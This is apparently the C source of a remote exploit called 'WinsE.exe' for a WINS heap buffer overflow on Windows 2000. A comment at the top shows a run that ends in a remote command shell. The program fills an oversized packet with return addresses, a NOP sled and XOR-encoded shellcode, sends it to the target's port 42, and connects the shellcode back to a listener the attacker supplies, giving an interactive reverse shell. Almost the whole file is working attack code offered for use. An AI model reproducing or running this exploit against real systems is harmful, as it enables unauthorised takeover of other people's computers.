////////////////////////////////////////////////////////// /* Windows Internet Name Service (WINS) Remote Heap Buffer Overflow WinsE.exe v1.0, written by beiyu WinsE.exe test on win2000 tw cn en sp4 and sp0, other not test pubwinse.exe 10.0.0.239 42 10.0.0.111 22222 # connected # Bind port on 10.0.0.111:22222 success # send packet ########## SHELL! ########## Microsoft Windows 2000 [ª©¥» 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32> C:\WINNT\system32>ipconfig -all ipconfig -all Windows 2000 IP Configuration Host Name . . . . . . . . . . . . : twgroup1-bfhc30 Primary DNS Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter °Ï°ì³s½u: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : AMD PCNET Family PCI Ethernet Adapter Physical Address. . . . . . . . . : 00-0C-29-03-84-D2 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 10.0.0.239 Subnet Mask . . . . . . . . . . . : 255.0.0.0 Default Gateway . . . . . . . . . : 10.0.0.1 DNS Servers . . . . . . . . . . . : 10.0.0.1 C:\WINNT\system32>exit # Connection closed ########## SHELL OVER! ########## */ //////////////////////////////////////////////////////////// #include #include #include #include "winsock2.h" #pragma comment(lib, "ws2_32") //12 char head [] = "\x00\x00\x23\xf8\x29\x00\xff\x23\x05\x39\x1e\xc8"; // // char addr1[] = "\x68\x22\x39\x05"; char addr2[] = "\x7c\xf4\x3d\x05"; char shellcoode[] = "\xeb\x10\x5a\x4a\x33\xc9\x66\xb9\x77\x01\x80\x34\x0a\x99\xe2\xfa" "\xeb\x05\xe8\xeb\xff\xff\xff" //decode xor 0x99 "\xcd\x12\x75\x1a\x75\xb1\x12\x6d\x71" "\x60\x99\x99\x99\x10\x9f\x66\xaf\xf1\x17\xd7\x97\x75\x71\x9d\x98" "\x99\x99\x10\xdf\x9d\x66\xaf\xf1\xeb\x67\x2a\x8f\x71\x6c\x99\x99" "\x99\x10\xdf\x91\x66\xaf\xf1\x76\x57\x79\xf9\x71\x7f\x99\x99\x99" "\x10\xdf\x95\xf1\xaa\xab\x99\x99\xf1\xee\xea\xab\xc6\xcd\x66\xcf" "\x9d\x10\xdf\x89\x66\xef\x89\xf1\x40\x90\x6c\x34\x71\x5c\x99\x99" "\x99\x10\xdf\x8d\x66\xef\x89\xf1\x75\x60\x33\xf9\x71\x2c\x99\x99" "\x99\x10\xdf\x81\x66\xef\x89\xf1\x7e\xe0\x5f\xe0\x71\x3c\x99\x99" "\x99\x10\xdf\x85\x66\xef\x89\xf1\x52\x74\x65\xa2\x71\x0c\x99\x99" "\x99\x10\xdf\xb9\x18\x75\x09\x98\x99\x99\xcd\xf1\x98\x98\x99\x99" "\x66\xcf\xb9\xc9\xc9\xc9\xc9\xd9\xc9\xd9\xc9\x66\xcf\x8d\x12\x41" "\xf1" "\x93\x99\x99\xf6" //bcip xor 0x99 "\xf1\x9b\x99" "\xbe\x96" //bcport xor 0x99 "\x12\x55\xf3\x89\xc8\xca" "\x66\xcf\x81\x1c\x59\xec\xda\xf1\xfa\xf4\xfd\x99\x10\xff\xa9\x1a" "\x75\xcd\x14\xa5\xbd\xaa\x50\x1a\x58\x8c\x32\x7b\x64\x5f\xdd\xbd" "\x89\xdd\x67\xdd\xbd\xa4\x10\xc5\xbd\xd1\x10\xc5\xbd\xd5\x10\xc5" "\xbd\xc9\x14\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xf3\x98\xc8\xc8\x66" "\xef\xa9\xc8\x66\xcf\x91\xca\x66\xcf\x85\x66\xcf\x95\xcc\xcf\xfd" "\x38\xa9\x99\x99\x99\x12\xd9\x95\x12\xe9\x85\x34\x12\xf1\x91\x12" "\x5c\xc7\xc4\x5b\x9d\x99\xca\xcc\xcf\xce\x12\xf5\xbd\x81\x12\xdc" "\xa5\x12\xcd\x9c\xe1\x9a\x4c\x12\xd3\x81\x12\xc3\xb9\x9a\x44\x7a" "\xab\xd0\x12\xad\x12\x9a\x6c\xaa\x66\x65\xaa\x59\x35\xa3\x5d\xed" "\x9e\x58\x56\x94\x9a\x61\x72\x6b\xa2\xe5\xbd\x8d\xec\x78\x12\xc3" "\xbd\x9a\x44\xff\x12\x95\xd2\x12\xc3\x85\x9a\x44\x12\x9d\x12\x9a" "\x5c\x72\x9b\xaa\x59\x12\x4c\xc6\xc7\xc4\xc2\x5b\x9d\x99\x00"; void usage(char* us) { printf(" \n"); printf("# WinsE.exe v1.0, written by beiyu\n"); printf("# WinsE.exe \n"); printf("# test on win2000 tw cn en sp4 and sp0, other not test\n\n"); return; } void shell (int sock) { int l; char buf[512]; struct timeval time; unsigned long ul[2]; time.tv_sec = 1; time.tv_usec = 0; while (1) { ul[0] = 1; ul[1] = sock; l = select (0, (fd_set *)&ul, NULL, NULL, &time); if(l == 1) { l = recv (sock, buf, sizeof (buf), 0); if (l <= 0) { printf ("# Connection closed\r\n"); return; } l = write (1, buf, l); if (l <= 0) { printf ("# Connection closed\r\n"); return; } } else { l = read (0, buf, sizeof (buf)); if (l <= 0) { printf("# Connection closed\r\n"); return; } l = send(sock, buf, l, 0); if (l <= 0) { printf("# Connection closed\r\n"); return; } if(memcmp(buf,"exit",4) == 0) { printf("# Connection closed\r\n"); return; } } } } int main(int argc,char *argv[]) { unsigned long cbip; unsigned short cbport; char ip[128]; unsigned short port; WSADATA wsadata; SOCKET s; fd_set mask; struct timeval timeout; struct sockaddr_in server; char* sendpacket; char* addr; if (argc!=5) { usage(argv[0]); return -1; } //04045.exe if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0) { printf("# wsastartup error\n"); return -1; } s=socket(AF_INET,SOCK_STREAM,0); if (s==-1) { printf("# socket error\n"); return -1; } strcpy(ip, argv[1]); port = atoi(argv[2]); cbip = inet_addr(argv[3])^0x99999999; cbport = htons(atoi(argv[4]))^(USHORT)0x9999; memcpy(&shellcoode[193], &cbip, 4); memcpy(&shellcoode[200], &cbport, 2); server.sin_family=AF_INET; server.sin_addr.s_addr=inet_addr(ip); server.sin_port=htons(port); connect(s,( struct sockaddr *)&server,sizeof(server)); timeout.tv_sec=3; timeout.tv_usec=0; FD_ZERO(&mask); FD_SET(s,&mask); switch(select(s+1,NULL,&mask,NULL,&timeout)) { case -1: { printf("# select error\n"); closesocket(s); return -1; } case 0: { printf("# connection failed\n"); closesocket(s); return -1; } default: if(FD_ISSET(s,&mask)) { printf("# connected\n"); struct sockaddr_in sa, client; SOCKET socklisten; socklisten=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(socklisten == INVALID_SOCKET) { printf("# Create socket failed:%d\r\n",GetLastError()); exit(-1); } sa.sin_family=AF_INET; sa.sin_port=htons(atoi(argv[4])); sa.sin_addr.S_un.S_addr=inet_addr(argv[3]); int Reuse; setsockopt(socklisten, SOL_SOCKET, SO_REUSEADDR, (char*)&Reuse, sizeof(Reuse)); if(bind(socklisten,(LPSOCKADDR)&sa,sizeof(sa))==SOCKET_ERROR) { printf("# Bind port on %s:%d error:%d\r\n", cbip, cbport,GetLastError()); closesocket(socklisten); } else { printf("# Bind port on %s:%d success\r\n", argv[3], atoi(argv[4])); listen(socklisten, 1); } sendpacket = (char*)malloc(65535); memset(sendpacket, 0, 65535); char last[7701] = {0}; memset(last,'\x90', 7701); /* \x68\x22\x39\x05 * 9 *10 + \x7c\xf4\x3d\x05 * 14 * 10 char addr1[] = "\x68\x22\x39\x05"; char addr2[] = "\x7c\xf4\x3d\x05"; */ addr = (char*)malloc(1024); memset(addr, 0, 1024); char* nop; nop = (char*)malloc(180); memset(nop, '\x90', 180); int tt = 0; for(int k = 0; k < 10; k++) { for(int t = 0; t < 9; t++) { memcpy(addr + tt, addr1, 4); tt += 4; } for(int j = 0; j < 14; j++) { memcpy(addr + tt, addr2, 4); tt += 4; } } // printf("tt is %d\n", tt); int sendlen = 0; memcpy(sendpacket + sendlen, head, 12); sendlen += 12; memcpy(sendpacket + sendlen, addr, tt); sendlen += tt; memcpy(sendpacket + sendlen, nop, 180); sendlen += 180; memcpy(sendpacket + sendlen, shellcoode, 399); sendlen += 399; memcpy(sendpacket + sendlen, last, 7701); sendlen += 7701; printf("# send packet\n"); if (send(s,sendpacket,sendlen,0)==-1) { printf("# sending error, the server prolly rebooted.\n"); return -1; } Sleep(1000); // printf("# get shell\n"); int len = sizeof(client); SOCKET sockback = accept(socklisten, (struct sockaddr*)&client, &len); if(sockback != INVALID_SOCKET) { // printf("# Exploit success! Get the Shell!\r\n"); printf(" ########## SHELL! ##########\r\n\r\n"); shell(sockback); closesocket(sockback); closesocket(socklisten); } closesocket(s); WSACleanup(); printf("\r\n ########## SHELL OVER! ##########\r\n"); return 0; } } closesocket(s); WSACleanup(); return 0; }